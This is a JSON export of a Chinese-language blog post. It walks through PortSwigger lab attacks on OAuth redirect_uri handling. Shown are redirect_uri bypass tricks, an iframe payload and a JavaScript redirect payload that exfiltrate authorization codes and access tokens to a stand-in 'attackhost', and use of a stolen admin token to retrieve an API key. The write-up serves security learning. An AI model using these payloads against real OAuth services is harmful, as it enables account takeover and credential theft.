{"id":1487,"date":"2023-03-26T23:40:00","date_gmt":"2023-03-26T15:40:00","guid":{"rendered":"https:\/\/systw.net\/note\/?p=1487"},"modified":"2024-04-05T19:48:54","modified_gmt":"2024-04-05T11:48:54","slug":"oauth-service-vulnerabilities","status":"publish","type":"post","link":"https:\/\/systw.net\/note\/archives\/1487","title":{"rendered":"OAuth Service Vulnerabilities\u00a0"},"content":{"rendered":"\n<p>\u63d0\u4f9b\u7b2c\u4e09\u65b9\u767b\u5165\u7684Oauth\u670d\u52d9\u4e3b\u6a5f\uff0c\u6703\u56e0\u70ba\u5be6\u4f5c\u6216\u914d\u7f6e\u7522\u751f\u6f0f\u6d1e\uff0c\u653b\u64ca\u8005\u53ef\u80fd\u5f97\u5230\u6388\u6b0a\u4ee3\u78bc\u6216\u5b58\u53d6\u6b0a\u6756\u507d\u9020\u5176\u4ed6\u4f7f\u7528\u8005\u767b\u5165<\/p>\n\n\n\n<p><\/p>\n\n\n\n<p>OAuth service\u4e2d\u7684\u6f0f\u6d1e\uff0c\u5e38\u898b\u7684\u6709<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u6d29\u6f0f\u6388\u6b0a\u78bc\u548c\u5b58\u53d6\u4ee4\u724c\uff1aOAuth\u670d\u52d9\u672c\u8eab\u7684\u914d\u7f6e\u4f7f\u653b\u64ca\u8005\u80fd\u5920\u7aca\u53d6\u8207\u5176\u4ed6\u4f7f\u7528\u8005\u5e33\u6236\u95dc\u806f\u7684\u6388\u6b0a\u4ee3\u78bc\u6216\u5b58\u53d6\u6b0a\u6756\uff0c\u5e38\u898b\u7684\u65b9\u6cd5\u662f\u642d\u914d<code>redirect_uri<\/code>\u5efa\u69cb\u985e\u4f3c CSRF \u7684\u653b\u64ca\uff0c\u5728\u5c07\u4ee3\u78bc\u6216\u4ee4\u724c\u767c\u9001\u5230\u653b\u64ca\u8005\u6307\u5b9a\u7684\u4f4d\u7f6e<\/li>\n\n\n\n<li>\u7bc4\u570d\u9a57\u8b49\u6709\u7f3a\u9677\uff1a\u5728\u67d0\u4e9b\u60c5\u6cc1\u4e0b\uff0c\u7531\u65bc OAuth \u670d\u52d9\u7684\u9a57\u8b49\u6709\u7f3a\u9677\uff0c\u653b\u64ca\u8005\u53ef\u80fd\u6703\u4f7f\u7528\u984d\u5916\u7684\u6b0a\u9650\u5347\u7d1a\u5b58\u53d6\u6b0a\u6756\uff0c\u5e38\u898b\u7684\u65b9\u6cd5\u662f\u5c0d<code>scope<\/code>\u53c3\u6578\u52d5\u624b\u8173<\/li>\n\n\n\n<li>\u672a\u7d93\u9a57\u8b49\u7684\u7528\u6236\u8a3b\u518a\uff1a\u4e00\u4e9b\u63d0\u4f9bOAuth\u670d\u52d9\u7684\u7db2\u7ad9\u5141\u8a31\u4f7f\u7528\u8005\u8a3b\u518a\u5e33\u6236\uff0c\u800c\u7121\u9700\u9a57\u8b49\u5176\u6240\u6709\u8a73\u7d30\u8cc7\u8a0a\uff0c\u653b\u64ca\u8005\u53ef\u4ee5\u900f\u904e\u4f7f\u7528\u8207\u76ee\u6a19\u4f7f\u7528\u8005\u76f8\u540c\u7684\u8a73\u7d30\u8cc7\u8a0a\uff0c\u4f8b\u5982\u5df2\u77e5\u7684\u96fb\u5b50\u90f5\u4ef6\u5730\u5740\uff0c\u5c31\u6709\u53ef\u80fd\u5141\u8a31\u653b\u64ca\u8005\u4ee5\u53d7\u5bb3\u8005\u8eab\u5206\u767b\u5165\u3002<\/li>\n<\/ul>\n\n\n\n<p>\u5176\u4ed6\u548cOAuth\u6709\u95dc\u6f0f\u6d1e\u53ef\u53c3\u8003\u4ee5\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>OAuth Client Application\uff1a <a href=\"https:\/\/systw.net\/note\/archives\/1465\">https:\/\/systw.net\/note\/archives\/1465<\/a><\/li>\n\n\n\n<li>OAuth OpenID Connect\uff1a <a href=\"https:\/\/systw.net\/note\/archives\/1493\">https:\/\/systw.net\/note\/archives\/1493<\/a><\/li>\n<\/ul>\n\n\n\n<div style=\"height:100px\" aria-hidden=\"true\" class=\"wp-block-spacer\"><\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5229\u7528redirect_uri\u6d29\u6f0f\u6388\u6b0a\u78bc <\/h2>\n\n\n\n<p>\u5982\u679c OAuth \u670d\u52d9\u7121\u6cd5\u6b63\u78ba\u9a57\u8b49<code>redirect_uri<\/code>\uff0c\u653b\u64ca\u8005\u53ef\u80fd\u80fd\u5920\u5efa\u69cb\u985e\u4f3c CSRF \u7684\u653b\u64ca\uff0c\u6b3a\u9a19\u53d7\u5bb3\u8005\u7684\u700f\u89bd\u5668\u555f\u52d5OAuth\u6d41\u7a0b\uff0c\u5c07\u6388\u6b0a\u4ee3\u78bc\u6216\u5b58\u53d6\u6b0a\u6756\u767c\u9001\u5230\u653b\u64ca\u8005\u63a7\u5236\u7684<code>redirect_uri<\/code>\uff0c\u8209\u4f8b\u5982\u4e0b <\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u7bc4\u4f8b\u7db2\u7ad9\u6b63\u5e38\u6d41\u7a0b<\/h3>\n\n\n\n<p>\u5047\u8a2d\u6709\u4e00\u7db2\u7ad9\u7b2c\u4e09\u65b9\u767b\u5165\u6d41\u7a0b\u5982\u4e0b\uff0c\u5148\u8a2a\u554f\/my-account\u548c\/social-login\u5f8c\uff0c\u63a5\u8457\u6703\u5c0doauth\u4e3b\u6a5f\u767c\u9001\u8acb\u6c42\uff0c\u62ff\u5230<code>code<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request to oauth ###############\nGET \/auth?client_id=xljn3qgaifklo9ahhk8os&amp;redirect_uri=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">https:\/\/acc11f551e138a1bc0352e5400ac0032.web-security-academy.net\/oauth-callback<\/mark>&amp;response_type=code&amp;scope=openid%20profile%20email\nHost: oauth-acd21fb81e638aaac0c22e5102ac0036.web-security-academy.net\n...omit...\n\n############# response ###############\n...omit... Redirecting to &lt;a href=\"<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">https:\/\/acc11f551e138a1bc0352e5400ac0032.web-security-academy.net\/oauth-callback<\/mark>?code=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Q_qF-LHv5g4ff-Tp3wfs5f11TP6KaqbMwn1YJ1uwhlF<\/mark>\"&gt;...omit...<\/code><\/pre>\n\n\n\n<p>\u62ff\u5230code\u5f8c\u6703\u5411\u7db2\u7ad9\u61c9\u7528\u7a0b\u5e8f\u767c\u9001\u8acb\u6c42\uff0c\u7db2\u7ad9\u78ba\u8a8d\u6c92\u554f\u984c\u5f8c\u8fd4\u56de\u767b\u5165\u6210\u529f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request ###############\nGET <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">\/oauth-callback<\/mark>?code=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">Q_qF-LHv5g4ff-Tp3wfs5f11TP6KaqbMwn1YJ1uwhlF<\/mark> HTTP\/1.1\nHost: <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">acc11f551e138a1bc0352e5400ac0032.web-security-academy.net<\/mark>\n...omit...\n\n############# response ###############\n...omit...You have successfully logged in with your social media account...omit...<\/code><\/pre>\n\n\n\n<p>\u63a5\u8457\u5c31\u53ef\u4ee5\u6b63\u5e38\u8a2a\u554f\u7db2\u7ad9<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request ###############\nGET \/my-account?id=wiener HTTP\/1.1\nHost: acc11f551e138a1bc0352e5400ac0032.web-security-academy.net\n...omit...\n\n############# response ###############\n...omit...Your username is: wiener...omit...<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u653b\u64ca\u6d41\u7a0b<\/h3>\n\n\n\n<p>\u8a2a\u554f\/my-account\u548c\/social-login\u5f8c\uff0c\u63a5\u8457\u6703\u5c0doauth\u4e3b\u6a5f\u767c\u9001\u4ee5\u4e0b\u8acb\u6c42<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/auth?client_id=xljn3qgaifklo9ahhk8os&amp;redirect_uri=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">https:\/\/acc11f551e138a1bc0352e5400ac0032.web-security-academy.net\/oauth-callback<\/mark>&amp;response_type=code&amp;scope=openid%20profile%20email HTTP\/1.1\nHost: oauth-acd21fb81e638aaac0c22e5102ac0036.web-security-academy.net<\/code><\/pre>\n\n\n\n<p>\u4f46\u628a\u9019\u500b\u8acb\u6c42\u7684redirect_uri\u6539\u70ba\u653b\u64ca\u8005\u4e3b\u6a5f<code>attackhost<\/code>\uff0c\u4e26\u5305\u88dd\u6210\u4ee5\u4e0b\u7db2\u9801\u653e\u5728\u653b\u64ca\u8005\u7db2\u7ad9\u4e0a<code>https:\/\/attackhost\/exploit<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;iframe src=\"https:\/\/oauth-acd21fb81e638aaac0c22e5102ac0036.web-security-academy.net\/auth?client_id=xljn3qgaifklo9ahhk8os&amp;redirect_uri=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">https:\/\/attackhost<\/mark>&amp;response_type=code&amp;scope=openid%20profile%20email\"&gt;&lt;\/iframe&gt;<\/code><\/pre>\n\n\n\n<p>\u8a98\u4f7fadmin\u8a2a\u554f\u653b\u64ca\u7db2\u5740<code>https:\/\/attackhost\/exploit<\/code>\uff0c\u4e00\u65e6\u53d7\u5bb3\u8005\u8a2a\u554f\u5c31\u53ef\u5728\u653b\u64ca\u8005\u4e3b\u6a5f<code>attackhost<\/code>\u770b\u5230\u4ee5\u4e0b\u8a2a\u554f\u65e5\u5fd7<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>203.177.137.206 2022-05-04 08:28:29 +0000 \"GET \/deliver-to-victim HTTP\/1.1\" 302 \"User-Agent: Mozilla\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.127 Safari\/537.36\"\n172.31.31.214   2022-05-04 08:28:29 +0000 \"GET \/exploit\/ HTTP\/1.1\" 200 \"User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\"\n172.31.31.214   2022-05-04 08:28:29 +0000 \"GET \/?code=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">3iX8irJ51FjDQQ1-cmuqP-EvW_odTwS53Cl6uNROLly<\/mark>\nHTTP\/1.1\" 200 \"User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/100.0.4896.75 Safari\/537.36\"\n...omit...<\/code><\/pre>\n\n\n\n<p>\u5f9e\u8a2a\u554f\u65e5\u5fd7\u53ef\u4ee5\u767c\u73feadmin\u7684<code>code<\/code>\u70ba<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">3iX8irJ51FjDQQ1-cmuqP-EvW_odTwS53Cl6uNROLly<\/mark>\uff0c\u6388\u6b0a\u4ee3\u78bc\u88ab\u6d29\u6f0f<\/p>\n\n\n\n<p>\u63a5\u8457\u4f7f\u7528admin\u7684<code>code<\/code>\u5411\u7db2\u7ad9\u61c9\u7528\u7a0b\u5e8f\u767c\u9001\u8acb\u6c42\uff0c\u7db2\u7ad9\u78ba\u8a8d\u6c92\u554f\u984c\u5f8c\u8fd4\u56de\u767b\u5165\u6210\u529f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request ###############\nGET <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">\/oauth-callback<\/mark>?code=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\"><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">3iX8irJ51FjDQQ1-cmuqP-EvW_odTwS53Cl6uNROLly<\/mark><\/mark> HTTP\/1.1\nHost: <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">acc11f551e138a1bc0352e5400ac0032.web-security-academy.net<\/mark>\n...omit...\n\n############# response ###############\n...omit...You have successfully logged in with your social media account...omit...<\/code><\/pre>\n\n\n\n<p>lab: OAuth account hijacking via redirect_uri<\/p>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">redirect_uri\u5b89\u5168\u6a5f\u5236\u5f31\u9ede<\/h2>\n\n\n\n<p>\u6709\u4e9b\u7db2\u7ad9\u6703\u5c0dredirect_uri\u505a\u5b89\u5168\u9650\u5236\uff0c\u56e0\u6b64\u76f4\u63a5\u50b3\u5165\u653b\u64ca\u7db2\u5740\u662f\u7121\u6548\u7684\uff0c\u4f46\u53ef\u900f\u904e\u4e00\u4e9b\u65b9\u5f0f\u9952\u904e\uff0c\u5e38\u898b\u7684\u6709\u4ee5\u4e0b<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>\u67d0\u4e9b\u5b89\u5168\u6a5f\u5236\u53ea\u6703\u6aa2\u67e5\u662f\u5426\u5305\u542b\u6b63\u78ba\u7684\u5b57\u4e32\u6216\u57df\u540d\uff0c\u56e0\u6b64\u53ea\u6709\u5728\u653b\u64ca\u7db2\u5740\u4e2d\u5305\u542b\u5408\u6cd5\u5b57\u4e32\u5373\u53ef\u9952\u904e<\/li>\n\n\n\n<li>\u4e00\u4e9b\u5b89\u5168\u6a5f\u5236\u6703\u5141\u8a31localhost\uff0c\u56e0\u6b64\u53ef\u4ee5\u70ba\u653b\u64ca\u7db2\u5740\u52a0\u4e0a\u4e00\u4e9blocalhost\u5b57\u4e32<br>\u4f8b\u5982 localhost.evil-user.net<\/li>\n\n\n\n<li>\u5c07\u984d\u5916\u7684\u503c\u9644\u52a0\u5728redirect_uri\u53c3\u6578\uff0c\u6216\u8a31\u5f8c\u7aef\u61c9\u7528\u6216\u4e0d\u540c\u7684\u5143\u4ef6\u6703\u5c0d\u7279\u5b9a\u683c\u5f0f\u6709\u53cd\u61c9<br>\u4f8b\u5982 https:\/\/default-host.com &amp;@foo.evil-user.net#@bar.evil-user.net\/<\/li>\n\n\n\n<li>\u4f7f\u75282\u500bredirect_uri\u53c3\u6578\u505a\u6c61\u67d3<br>\u4f8b\u5982 https:\/\/oauth-authorization-server.com\/?client_id=123&amp;<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">redirect_uri<\/mark>=client-app.com\/callback&amp;<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">redirect_uri<\/mark>=evil-user.net<\/li>\n\n\n\n<li>\u5229\u7528\u7db2\u7ad9\u7684\u958b\u653e\u91cd\u5b9a\u5411\u6f0f\u6d1e\u9952\u904e\uff0c\u4f8b\u5982directory travel\u6216\u4efb\u610f\u8df3\u8f49\u7b49\u554f\u984c<\/li>\n<\/ul>\n\n\n\n<p><\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity is-style-dots\"\/>\n\n\n\n<p><\/p>\n\n\n\n<h2 class=\"wp-block-heading\">\u5229\u7528\u9952\u904eredirect_uri\u5b89\u5168\u6a5f\u5236\u6d29\u9732\u5b58\u53d6\u4ee4\u724c&nbsp;<\/h2>\n\n\n\n<p>\u5229\u7528\u958b\u653e\u91cd\u5b9a\u5411\u6f0f\u6d1e\u9952\u904eredirect_uri\u5b89\u5168\u6a5f\u5236\u7684\u8aaa\u660e\u8209\u4f8b\u5982\u4e0b<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u6b63\u5e38\u6d41\u7a0b\u89c0\u5bdf<\/h3>\n\n\n\n<p>\u67d0\u4e00\u7db2\u7ad9\u7b2c\u4e09\u65b9\u767b\u5165\u6d41\u7a0b\u5982\u4e0b\uff0c\u8a2a\u554f\/my-account\u548c\/social-login\u5f8c\uff0c\u63a5\u8457\u6703\u5c0doauth\u4e3b\u6a5f\u767c\u9001\u8acb\u6c42\uff0c\u62ff\u5230<code>access_token<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request to oauth###############\nGET \/auth?client_id=vpwszdmkr8uss4wsl4bir&amp;redirect_uri=https:\/\/acc71f371e54744bc0a407ed00b40056.web-security-academy.net\/oauth-callback&amp;response_type=token&amp;nonce=-601412001&amp;scope=openid%20profile%20email HTTP\/1.1\nHost: oauth-acd71ff41e90747cc00207ce02ab00e2.web-security-academy.net\n\n############# response ###############\nHTTP\/1.1 302 Found\n...omit...\nRedirecting to &lt;a href=\"https:\/\/acc71f371e54744bc0a407ed00b40056.web-security-academy.net\/oauth-callback#access_token=cc9zGyAFHyBgBothJ6sXEbIzvOlZoE770NWeorbGSfz&amp;amp;expires_in=3600&amp;amp;token_type=Bearer&amp;amp;scope=openid%20profile%20email\n...omit...<\/code><\/pre>\n\n\n\n<p>\u62ff\u5230<code>access_token<\/code>\u5f8c\u6703\u5411\u7db2\u7ad9\u61c9\u7528\u7a0b\u5e8f\u767c\u9001\u8acb\u6c42\uff0c\u7db2\u7ad9\u78ba\u8a8d\u6c92\u554f\u984c\u5f8c\u8fd4\u56de\u767b\u5165\u6210\u529f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request ###############\nGET \/oauth-callback HTTP\/1.1\nHost: acc71f371e54744bc0a407ed00b40056.web-security-academy.net\n\n############# response ###############\nHTTP\/1.1 200 OK\nContent-Type: text\/html; charset=utf-8\nConnection: close\nContent-Length: 734\n\t\t\n&lt;script&gt;\n\tconst urlSearchParams = new URLSearchParams(window.location.hash.substr(1));\n\tconst token = urlSearchParams.get('access_token');\n\tfetch('https:\/\/oauth-acd71ff41e90747cc00207ce02ab00e2.web-security-academy.net\/me', {\n\t\t    method: 'GET',\n\t\t    headers: {\n\t\t        'Authorization': 'Bearer ' + token,\n\t\t        'Content-Type': 'application\/json'\n\t\t    }\n\t})\n\t.then(r =&gt; r.json())\n\t.then(j =&gt; \n\t   fetch('\/authenticate', {\n\t\t    method: 'POST',\n\t\t    headers: {\n\t\t         'Accept': 'application\/json',\n\t\t         'Content-Type': 'application\/json'\n\t\t    },\n\t\t    body: JSON.stringify({\n\t\t         email: j.email,\n\t\t         username: j.sub,\n\t\t         token: token\n\t\t    })\n\t  }).then(r =&gt; document.location = '\/'))\n&lt;\/script&gt;<\/code><\/pre>\n\n\n\n<p>\u63a5\u8457\u6703\u5c0doauth\u4e3b\u6a5f\/me\u767c\u9001\u8acb\u6c42\uff0c\u4e26\u628a\u525b\u62ff\u5230\u7684access_token\u653e\u5728Authorization\uff0c\u5c31\u53ef\u5f97\u5230\u7528\u6236\u7684apikey<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request to oauth ###############\nGET \/me HTTP\/1.1\nHost: oauth-acd71ff41e90747cc00207ce02ab00e2.web-security-academy.net\nSec-Ch-Ua: \"Chromium\";v=\"94\", \"Google Chrome\";v=\"94\", \";Not A Brand\";v=\"99\"\nAuthorization: Bearer cc9zGyAFHyBgBothJ6sXEbIzvOlZoE770NWeorbGSfz\n\n############# response ###############\n...omit...\n{\"sub\":\"wiener\",\"apikey\":\"uslpYmY9Ud3Zxitb4i7Fx1XkSMcqShX4\",\"name\":\"Peter Wiener\",\"email\":\"wiener@hotdog.com\",\"email_verified\":true}<\/code><\/pre>\n\n\n\n<p>\u7136\u5f8c\u900f\u904eauthenticate\u548c\u7db2\u7ad9\u61c9\u7528\u7a0b\u5e8f\u767c\u9001\u8acb\u6c42\uff0c\u78ba\u8a8d\u6c92\u554f\u984c\u8fd4\u56de302<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request ###############\nPOST \/authenticate HTTP\/1.1\nHost: acc71f371e54744bc0a407ed00b40056.web-security-academy.net\n...omit...\n{\"email\":\"wiener@hotdog.com\",\"username\":\"wiener\",\"token\":\"cc9zGyAFHyBgBothJ6sXEbIzvOlZoE770NWeorbGSfz\"}\n\n############# response ###############\nHTTP\/1.1 302 Found\nLocation: \/<\/code><\/pre>\n\n\n\n<p><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">\u653b\u64ca\u904e\u7a0b<\/h3>\n\n\n\n<p><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">1.\u8def\u5f91\u554f\u984c<\/h4>\n\n\n\n<p>\u7531\u65bc<code>redirect_uri<\/code>\u5df1\u88ab\u9650\u5236\u4e0d\u80fd\u9023\u5230\u653b\u64ca\u7db2\u7ad9\uff0c\u56e0\u6b64\u8981\u5c0b\u6c42\u5176\u4ed6\u65b9\u6cd5<\/p>\n\n\n\n<p>\u4f46\u76ee\u6a19\u7db2\u7ad9\u767c\u73fe2\u500b\u554f\u984c\u6240\u4ee5\u53ef\u514b\u670d\u9019\u500b\u5b89\u5168\u9650\u5236<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>directory travel\u554f\u984c\uff1a <code>https:\/\/YOUR-LAB-ID.web-security-academy.net\/oauth-callback\/..\/post?postId=1<\/code><\/li>\n\n\n\n<li>\u4efb\u610f\u8df3\u8f49\u554f\u984c\uff1a <code>https:\/\/YOUR-LAB-ID.web-security-academy.net\/post\/next?path=http:\/\/attackhost<\/code><\/li>\n<\/ul>\n\n\n\n<p>\u56e0\u6b64\u53ef\u4ee5\u7d50\u5408\u90192\u500b\u554f\u984c\uff0c\u8b93<code>redirect_uri<\/code>\u8df3\u8f49\u5230\u653b\u64ca\u7db2\u7ad9\uff1a<\/p>\n\n\n\n<p><code>redirect_uri=https:\/\/0a7e00ec0365f4dbc0af04400078005d.web-security-academy.net\/oauth-callback\/<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">..\/post\/next?path=https:\/\/attackhost\/exploit<\/mark> <\/code><\/p>\n\n\n\n<p><\/p>\n\n\n\n<h4 class=\"wp-block-heading\">2.\u88fd\u505a\u653b\u64ca\u7db2\u9801<\/h4>\n\n\n\n<p>\u5148\u53d6\u5f97\u4e00\u958b\u59cb\u5c0doauth\u4e3b\u6a5f\u767c\u9001\u8acb\u6c42 <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>GET \/auth?client_id=vpwszdmkr8uss4wsl4bir&amp;redirect_uri=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">https:\/\/acc71f371e54744bc0a407ed00b40056.web-security-academy.net\/oauth-callback<\/mark>&amp;response_type=token&amp;nonce=-601412001&amp;scope=openid%20profile%20email HTTP\/1.1\nHost: oauth-acd71ff41e90747cc00207ce02ab00e2.web-security-academy.net<\/code><\/pre>\n\n\n\n<p>\u7136\u5f8c\u628a\u9019\u500b\u8acb\u6c42\u7684redirect_uri\u642d\u914d2\u500b\u8def\u5f91\u554f\u984c\u6539\u70ba\u653b\u64ca\u8005\u4e3b\u6a5f<code>attackhost<\/code>\uff0c\u4e26\u5305\u88dd\u6210\u4ee5\u4e0b\u7db2\u9801\u653e\u5728\u653b\u64ca\u8005\u7db2\u7ad9\u4e0a<code>https:\/\/attackhost\/exploit<\/code><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>&lt;script&gt;\n    if (!document.location.hash) {\n        window.location = 'https:\/\/oauth-0a860026034ff4abc02b04a402ed00e0.web-security-academy.net\/auth?client_id=iwkqgpp7745pos692l5e1&amp;redirect_uri=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">https:\/\/0a7e00ec0365f4dbc0af04400078005d.web-security-academy.net\/oauth-callback\/<\/mark><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-red-color\">..\/post\/next?path=https:\/\/attackerhost\/exploit\/<\/mark>&amp;response_type=token&amp;nonce=399721827&amp;scope=openid%20profile%20email'\n    } else {\n        window.location = '\/?'+document.location.hash.substr(1)\n    }\n&lt;\/script&gt;<\/code><\/pre>\n\n\n\n<h4 class=\"wp-block-heading\">3.\u8a98\u4f7f\u53d7\u5bb3\u8005\u8a2a\u554f\u60e1\u610f\u7db2\u9801<\/h4>\n\n\n\n<p>\u8a98\u4f7fadmin\u8a2a\u554f\u653b\u64ca\u7db2\u5740<code>https:\/\/attackhost\/exploit<\/code><\/p>\n\n\n\n<p>\u4e00\u65e6\u53d7\u5bb3\u8005\u8a2a\u554f\u653b\u64ca\u7db2\u9801\u6703\u6839\u64da\u4ee3\u78bc\u52d5\u4f5c\u8f49\u57402\u6b21\uff0c\u7b2c\u4e00\u6b21\u6703\u8f49\u5740\u5230 <code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">https:\/\/attackhost\/exploit<\/mark>#access_token=cc9zGyAFHyBgBothJ6sXEbIzvOlZoE770NWeorbGSfz&amp;amp;expires_in=3600&amp;amp;token_type=Bearer&amp;amp;scope=openid%20profile%20email<\/code><\/p>\n\n\n\n<p>\u7b2c\u4e8c\u6b21\u5728\u8f49\u5230<code><mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-cyan-blue-color\">https:\/\/attackhost\/<\/mark>?access_token=cc9zGyAFHyBgBothJ6sXEbIzvOlZoE770NWeorbGSfz&amp;amp;expires_in=3600&amp;amp;token_type=Bearer&amp;amp;scope=openid%20profile%20email<\/code><\/p>\n\n\n\n<p>\u63a5\u8457\u5c31\u53ef\u5728\u653b\u64ca\u8005\u4e3b\u6a5f<code>attackhost<\/code>\u770b\u5230\u4ee5\u4e0b\u8a2a\u554f\u65e5\u5fd7<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>10.0.3.244      2022-06-01 09:22:38 +0000 \"GET \/?access_token=<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-green-cyan-color\">Bkgrt_ypdsbSUuXMW7HFa9NXitypHaXF_lALFGpklZj<\/mark>&amp;expires_in=3600&amp;token_type=Bearer&amp;scope=openid%20profile%20email HTTP\/1.1\" 200 \"User-Agent: Mozilla\/5.0 (X11; Linux x86_64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/102.0.5005.61 Safari\/537.36\"\n...omit...<\/code><\/pre>\n\n\n\n<p>\u5f9e\u8a2a\u554f\u65e5\u5fd7\u53ef\u4ee5\u767c\u73feadmin\u7684<code>access_token<\/code>\u70ba<mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-green-cyan-color\">Bkgrt_ypdsbSUuXMW7HFa9NXitypHaXF_lALFGpklZj<\/mark>\uff0c\u5b58\u53d6\u6b0a\u4ee4\u724c\u88ab\u6d29\u6f0f<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">4.\u4f7f\u7528admin\u7684token\u53d6\u5f97apikey<\/h4>\n\n\n\n<p>\u63a5\u8457\u5c07access_token\u653e\u5165Authorization\u5c0d\/me\u9001\u51fa\u8acb\u6c42\uff0c\u5c31\u53ef\u53d6\u5f97admin\u7684apikey<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>############# request ###############\nGET \/me HTTP\/1.1\nHost: oauth-0a860026034ff4abc02b04a402ed00e0.web-security-academy.net\nSec-Ch-Ua: \"Chromium\";v=\"94\", \"Google Chrome\";v=\"94\", \";Not A Brand\";v=\"99\"\nAuthorization: Bearer <mark style=\"background-color:rgba(0, 0, 0, 0)\" class=\"has-inline-color has-vivid-green-cyan-color\">Bkgrt_ypdsbSUuXMW7HFa9NXitypHaXF_lALFGpklZj\n<\/mark>\n...omit...\n\n############# response ###############\n{\"sub\":\"administrator\",\"apikey\":\"YDIPrjtNEoC5T7kFzIQGaySwOi4KVAaE\",\"name\":\"Administrator\",\"email\":\"administrator@normal-user.net\",\"email_verified\":true}\n\n<\/code><\/pre>\n\n\n\n<p>\u6210\u529f\u53d6\u5f97admin\u7684apikey: YDIPrjtNEoC5T7kFzIQGaySwOi4KVAaE<\/p>\n\n\n\n<p>Lab: Stealing OAuth access tokens via an open redirect<\/p>\n\n\n\n<p><\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u63d0\u4f9b\u7b2c\u4e09\u65b9\u767b\u5165\u7684Oauth\u670d\u52d9\u4e3b\u6a5f\uff0c\u6703\u56e0\u70ba\u5be6\u4f5c\u6216\u914d\u7f6e\u7522\u751f\u6f0f\u6d1e\uff0c\u653b\u64ca\u8005\u53ef\u80fd\u5f97\u5230\u6388\u6b0a\u4ee3\u78bc\u6216\u5b58\u53d6\u6b0a\u6756\u507d\u9020\u5176\u4ed6\u4f7f\u7528\u8005\u767b\u5165<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"fifu_image_url":"","fifu_image_alt":"","_jetpack_memberships_contains_paid_content":false,"footnotes":"","jetpack_publicize_message":"","jetpack_publicize_feature_enabled":true,"jetpack_social_post_already_shared":false,"